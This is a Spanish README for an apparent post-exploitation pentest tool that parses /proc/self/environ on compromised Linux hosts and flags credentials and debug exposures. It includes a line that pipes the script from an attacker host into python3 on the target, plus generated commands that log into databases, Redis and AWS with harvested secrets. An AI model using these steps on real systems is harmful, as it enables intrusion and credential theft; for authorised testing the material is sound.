
Analiza y visualiza /proc/self/environ en máquinas Linux comprometidas — categoriza las variables de entorno por stack tecnológico (AWS, Django, Rails, NodeJS, MySQL, K8s, Docker, etc…) y genera hallazgos clasificados por severidad con comandos listos para ejecutar
___________ ____ ____.__ .__ .__
\_ _____/ _______ _\ \ / /|__| ________ _______ | | |__|_______ ___________
| __)_ / \ \/ /\ Y / | |/ ___/ | \__ \ | | | \___ // __ \_ __ \
| \ | \ / \ / | |\___ \| | // __ \| |_| |/ /\ ___/| | \/
/_______ /___| /\_/ \___/ |__/____ >____/(____ /____/__/_____ \\___ >__|
\/ \/ \/ \/ \/ \/
Analiza, categoriza y visualiza
/proc/self/environen máquinas Linux comprometidas.
Convierte un muro de texto de variables de entorno fusionadas en inteligencia estructurada y codificada por colores — en segundos.
Autor: @W4r10ck423
Cuando accedes a una máquina y lees /proc/self/environ, obtienes esto:
USER=devnpm_config_user_agent=npm/8.5.1 node/v12.22.9 linux x64 workspaces/falsenpm_node_execpath=/usr/bin/nodenpm_config_noproxy=HOME=/home/devnpm_package_json=/home/dev/projects/store1/package.jsonnpm_config_local_prefix=/home/dev/projects/store1SYSTEMD_EXEC_PID=881COLOR=0LOGNAME=devJOURNAL_STREAM=8:6005PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binNODE=/usr/bin/nodeLANG=C.UTF-8npm_lifecycle_script=nodemon --exec 'node --inspect=127.0.0.1:9229 /home/dev/projects/store1/start.js'SHELL=/bin/bashnpm_lifecycle_event=watchEDITOR=vi
EnvVisualizer lo convierte en esto:
============================================================================
EnvVisualizer — /proc/self/environ (32 variables)
============================================================================
── Identity (4) ───────────────────────────────────────────────────────────
HOME /home/dev
LOGNAME dev
SHELL /bin/bash
USER dev
── Paths & Dirs (10) ──────────────────────────────────────────────────────
PATH
• /home/dev/projects/store1/node_modules/.bin
• /home/dev/projects/node_modules/.bin
• /usr/local/sbin
• /usr/local/bin
• /usr/sbin
• /usr/bin
• /sbin
• /bin
• /snap/bin
PWD /home/dev/projects/store1
npm_config_cache /home/dev/.npm
npm_execpath /usr/share/nodejs/npm/bin/npm-cli.js
── NPM / Node (12) ────────────────────────────────────────────────────────
NODE /usr/bin/node
npm_command run-script
npm_config_user_agent npm/8.5.1 node/v12.22.9 linux x64 workspaces/false
npm_lifecycle_script nodemon --exec 'node --inspect=127.0.0.1:9229 ...'
npm_package_json /home/dev/projects/store1/package.json
── System (6) ─────────────────────────────────────────────────────────────
COLOR 0
EDITOR vi
INVOCATION_ID abc0ab20c7dd498792d8be51c591071a
JOURNAL_STREAM 8:6005
LANG C.UTF-8
SYSTEMD_EXEC_PID 881
── Pentest Insights ────────────────────────────────────────────────────────
▶ Node.js debugger exposed → 127.0.0.1:9229 (try: node-inspector / chrome://inspect)
▶ Home dir: /home/dev
▶ Shell: /bin/bash
▶ npm_lifecycle_script = nodemon --exec 'node --inspect=127.0.0.1:9229 ...'
▶ npm_lifecycle_event = watch
Con rich instalado, cada categoría obtiene su propia tabla codificada por colores.
npm_*, node_*, pip_*, etc.)TOKEN, KEY, SECRET, PASSWORD, etc.) con una advertencia ⚠rich instalado; salida de texto plano limpia como respaldo (sin dependencias requeridas)git clone https://github.com/w4r10ck423/EnvVisualizer.git
cd EnvVisualizer
pip install rich # optional but recommended
python3 envvisualizer.py --help
git clone https://github.com/w4r10ck423/EnvVisualizer.git
cd EnvVisualizer
pip install .
envvisualizer --help
Copia envvisualizer.py a la máquina objetivo o atacante. Se ejecuta sin dependencias:
# On the attacker machine — host it
python3 -m http.server 8080
# On the target machine — grab and run
curl http://<attacker-ip>:8080/envvisualizer.py | python3 - -f /proc/self/environ
| Dependencia | Versión | Requerida |
|---|---|---|
| Python | ≥ 3.8 | Sí |
| rich | ≥ 13.0 | No (respaldo de texto plano) |
usage: envvisualizer [-h] [-f PATH] [-r STRING] [--no-rich]
options:
-h, --help show this help message and exit
-f PATH, --file PATH Environ file path (null-byte delimited)
-r STRING, --raw STRING
Raw concatenated environ string (copy-pasted, no null bytes)
--no-rich Force plain-text output
Consejo: Prefiere
-fsiempre que tengas acceso al archivo.
El delimitador de byte nulo en el archivo real es exacto — no se necesitan heurísticas.
# Current process
python3 envvisualizer.py -f /proc/self/environ
# Another process by PID
python3 envvisualizer.py -f /proc/1337/environ
# Any process you can read
python3 envvisualizer.py -f /proc/$(pgrep node)/environ
cat /proc/self/environ | python3 envvisualizer.py
python3 envvisualizer.py -r 'USER=devnpm_config_user_agent=npm/8.5.1 node/v12.22.9 ...'
python3 envvisualizer.py -f /proc/self/environ --no-rich
Las variables se agrupan en 12 categorías, evaluadas en orden de prioridad (la primera coincidencia gana).
El panel de Pentest Insights dispara detecciones específicas y conscientes del stack con cuatro niveles de severidad.
Los comandos listos para ejecutar se generan al vuelo a partir de los valores reales encontrados en el entorno.
── Pentest Insights ─────────────────────────────────────────────────────────
[!!!] PostgreSQL password in env → psql postgresql://appuser:[email protected]:5432/production_db
[!!!] DATABASE_URL contains embedded credentials → postgresql://admin:[email protected]:5432/maindb
[!!!] MongoDB root credentials in env → mongosh -u admin -p 'mongoS3cret'
[!!!] AWS long-term credentials → KEY=AKIAIOSFODNN7EXAMPLE (run: aws sts get-caller-identity)
[!!!] HashiCorp Vault token in env → vault token lookup addr: http://vault.internal:8200
[!!!] Stripe LIVE secret key — production payment API access
[!!!] Rails master key in env — decrypts config/credentials.yml.enc
[!! ] Redis auth → redis-cli -h redis.internal -p 6379 -a 'r3disP@ss'
[!! ] Inside Kubernetes pod → service host: 10.96.0.1
[!! ] GitHub token in env → curl -H 'Authorization: token $GITHUB_TOKEN' ...
[!! ] Django DEBUG=True — full stack traces served to users
[!! ] JVM remote debugging enabled → -agentlib:jdwp=... (try: jdb -attach <host>:<port>)
[ * ] Python venv active → /var/www/myapp/.venv
Cuando /proc/self/environ se copia y pega (por ejemplo, desde un web shell o salida de curl), los bytes nulos se eliminan, fusionando variables adyacentes:
USER=dev·npm_config_user_agent=npm/8.5.1...
↑──↑↑───────────────────↑
value next key starts here
Una división ingenua por WORD= produciría devnpm_config_user_agent como clave.
EnvVisualizer utiliza un detector de límites de dos clases que solo divide en:
USER, HOME, JOURNAL_STREAM, etc.npm_*, node_*, pip_*, java_*, python_*, ruby_*, etc.Debido a que la regex encuentra npm_config_user_agent dentro del token fusionado, el valor anterior se recorta automáticamente a dev. Sin lookbehind, sin suposiciones de límites de palabra — solo el patrón de clave mismo como ancla.
MIT — úsalo libremente, se agradece la atribución.
| Método | Comando | Precisión |
|---|
| Lectura directa de archivo | python3 envvisualizer.py -f /proc/self/environ | ✅ Perfecta (división por byte nulo) |
| Tubería stdin | cat /proc/self/environ | python3 envvisualizer.py | ✅ Perfecta (división por byte nulo) |
| Cadena pegada | python3 envvisualizer.py -r 'USER=dev...' | ✅ Buena (heurística de dos clases) |
| Sin argumentos (demo) | python3 envvisualizer.py | ✅ Perfecta (proceso propio) |
| Categoría | Variables Típicas |
|---|
| 🔐 Seguridad / Autenticación | SSH_*, SUDO_*, cualquier cosa que coincida con TOKEN, KEY, SECRET, PASSWORD, CREDENTIAL, CERT |
| 👤 Identidad | USER, LOGNAME, HOME, SHELL, UID, GID |
| 🗄 Base de Datos | PG*, MYSQL_*, MONGO*, REDIS_*, DATABASE_URL, DB_*, ELASTIC*, CASSANDRA_*, SQLALCHEMY_* |
| ☁ Nube / Infraestructura | AWS_*, GOOGLE_*, AZURE_*, ARM_*, DOCKER_*, KUBERNETES_*, VAULT_*, TF_*, CLOUDFLARE_* |
| 🔄 CI/CD y VCS | GITHUB_*, GITLAB_*, CI_*, TRAVIS_*, CIRCLE*, JENKINS_*, HEROKU_*, BUILD_* |
| 🔌 APIs de Terceros | STRIPE_*, TWILIO_*, SENDGRID_*, SENTRY_*, DD_*, SLACK_*, OPENAI_*, ALGOLIA_*, AUTH0_* |
| 🕸 Frameworks Web | DJANGO_*, FLASK_*, RAILS_*, SPRING_*, ASPNETCORE_*, APP_KEY/ENV/DEBUG, SECRET_KEY_BASE, MIX_ENV, NEXT_*, VITE_*, REACT_APP_* |
| 🐍 Runtimes de Aplicación | PYTHON*, CONDA_*, VIRTUAL_ENV, GEM_*, BUNDLE_*, JAVA_*, JVM_*, MAVEN_*, CATALINA_*, GO*, RUST*, CARGO_*, PHP_*, DOTNET_*, PERL*, DENO_* |
| 📦 NPM / Node | npm_*, NODE, NODE_ENV, NODE_OPTIONS |
| 📂 Rutas y Directorios | PATH, PWD, *_DIR, *_PREFIX, *_HOME, *_CACHE, INIT_CWD |
| 🌐 Red / Proxy | *_PROXY, HOSTNAME, SSL_CERT_*, CURL_CA_BUNDLE, *_URL, *_ADDR |
| ⚙ Sistema | LANG, TERM, EDITOR, INVOCATION_ID, JOURNAL_STREAM, XDG_*, LC_* |
| Otros | Todo lo demás, ordenado alfabéticamente |
| Severidad | Prefijo | Significado |
|---|
💀 CRITICAL | [!!!] | Credencial activa, clave secreta o clave maestra — impacto inmediato |
⚠ HIGH | [!! ] | Token, modo debug o servicio expuesto — ruta de ataque accionable |
→ MEDIUM | [! ] | Información interesante que puede asistir la escalada |
▶ INFO | [ * ] | Contexto general sobre el proceso y el entorno |
| Stack | Qué se detecta |
|---|
| PostgreSQL | PGPASSWORD → construye automáticamente psql postgresql://user:pass@host/db |
| MySQL / MariaDB | MYSQL_ROOT_PASSWORD / MYSQL_PASSWORD → construye automáticamente el comando mysql |
| MongoDB | MONGO_INITDB_ROOT_* → construye automáticamente el comando mongosh |
| Redis | REDIS_PASSWORD → construye automáticamente el comando redis-cli -a |
| URLs de BD | DATABASE_URL, MONGODB_URI, etc. → marca credenciales incrustadas |
| AWS | Par de claves → marca como de largo plazo o temporal STS, sugiere aws sts get-caller-identity |
| GCP | GOOGLE_APPLICATION_CREDENTIALS → sugiere gcloud auth activate-service-account |
| Azure | AZURE_CLIENT_SECRET → marca el ID de inquilino + sugiere az login --service-principal |
| HashiCorp Vault | VAULT_TOKEN + VAULT_ADDR → sugiere vault token lookup |
| Kubernetes | KUBERNETES_SERVICE_HOST inyectado → marca contexto de pod, sugiere lectura de token SA |
| Docker | DOCKER_HOST establecido → marca exposición del daemon |
| GitHub / GitLab | Tokens → sugiere comandos curl de validación de API |
| Heroku | HEROKU_API_KEY → marca con nombre de aplicación |
| Stripe | sk_live_* en vivo → CRITICAL; sk_test_* de prueba → MEDIUM |
| Datadog | DD_API_KEY → marca acceso a métricas/logs/trazas |
| Slack | SLACK_BOT_TOKEN / SLACK_APP_TOKEN → marca acceso al workspace |
| OpenAI | OPENAI_API_KEY → marca exposición de facturación |
| Django | DJANGO_DEBUG=True → marca exposición de stack trace |
| Flask | FLASK_DEBUG=1 → marca depurador interactivo de Werkzeug (bypass de PIN / SSTI) |
| Laravel | APP_DEBUG=true + APP_KEY=base64:* → marca ruta de falsificación de cookies |
| Rails | RAILS_MASTER_KEY → CRITICAL (descifra credentials.yml.enc); SECRET_KEY_BASE → falsificación de cookie de sesión |
| JVM | JAVA_TOOL_OPTIONS con jdwp → marca puerto de depuración remota, sugiere jdb -attach |
| Tomcat | CATALINA_HOME → marca ruta a tomcat-users.xml |
| Node.js | --inspect / --inspect-brk → marca depurador, sugiere chrome://inspect |
| Kerberos | KRB5CCNAME → marca caché de tickets, sugiere klist / Impacket |
| Sudo | SUDO_USER → muestra UID/GID original antes de la escalada |